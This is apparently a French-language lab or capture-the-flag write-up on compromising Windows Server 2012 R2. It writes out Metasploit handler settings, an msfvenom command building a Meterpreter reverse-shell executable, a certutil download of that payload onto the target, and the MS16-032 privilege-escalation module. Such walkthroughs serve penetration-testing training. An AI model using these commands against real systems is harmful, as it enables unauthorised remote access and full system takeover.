# Windows Server 2012 (Kernel Exploitation)

### Kernel Explotation:

Nous avons recherché des exploits spécifiques à Windows Server 2012 R2 pour l'escalade locale des privilèges. L'exploit **MS16-032** s'est avéré être pertinent pour cette version de Windows.

{% embed url="<https://github.com/SecWiki/windows-kernel-exploits>" %}

* **MS16-032** pour Windows 2012 R2 (local privilege escalation).

{% embed url="<https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-032>" %}

### **Reverse Shell via Metasploit**

Nous avons ensuite créé un fichier .exe pour établir une reverse shell depuis Metasploit. Les étapes suivantes ont été suivies :

Mise en écoute sur Metasploit :

```bash
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.12
set LPORT 4444
exploit -j
```

Création du payload `shell.exe` avec la commande suivante :

<pre class="language-bash"><code class="lang-bash"><strong>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.12 LPORT=4444 -f exe -o shell.exe
</strong></code></pre>

Transfert du payload à l'aide d'un serveur HTTP Python et de `certutil` :

```bash
python3 -m http.server
```

```powershell
certutil.exe -f -urlcache -split http://10.10.14.12:8000/shell.exe
```

Une fois le fichier transféré, nous avons réussi à établir une session Meterpreter (session 1).

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2FKud7qD0t1YidEki2s2nJ%2F%7BE5EC4AAC-05B1-49B0-A905-6BE38E958335%7D.png?alt=media&#x26;token=14978113-d377-4dc1-a28d-dc864046e79d" alt=""><figcaption></figcaption></figure>

### **Exploitation Vulnérabilité MS16-032**

Après avoir obtenu l'accès à la machine, nous avons recherché l'exploit vulnérable dans Metasploit :

`exploit/windows/local/ms16_032_secondary_logon_handle_privesc`

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2FpCCEeh8dO2hXfK69hDkt%2F%7BC17F2E45-D535-442F-8595-F9E1656ECA02%7D.png?alt=media&#x26;token=f90cdf50-a2d4-42ab-970a-c1fe0a3da3ac" alt="" width="563"><figcaption></figcaption></figure>

Nous avons configuré les sessions, défini `LHOST` et `LPORT`, et choisi la cible Windows x64 pour éviter tout conflit. Après l'exécution de l'exploit, nous avons obtenu un accès complet au système cible.

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2F22z12KpRrPAMyifusxLS%2F%7BB41B6ED5-23DE-4E9C-8FB5-914445EE515F%7D.png?alt=media&#x26;token=ac0eaf32-c3d7-4f38-9c0a-a10419063f8a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2FgRuCQfmtG72RKV6beYD6%2Fimage.png?alt=media&#x26;token=d8197203-97b4-4f0f-b6f2-93ffca0c3fd7" alt=""><figcaption></figcaption></figure>
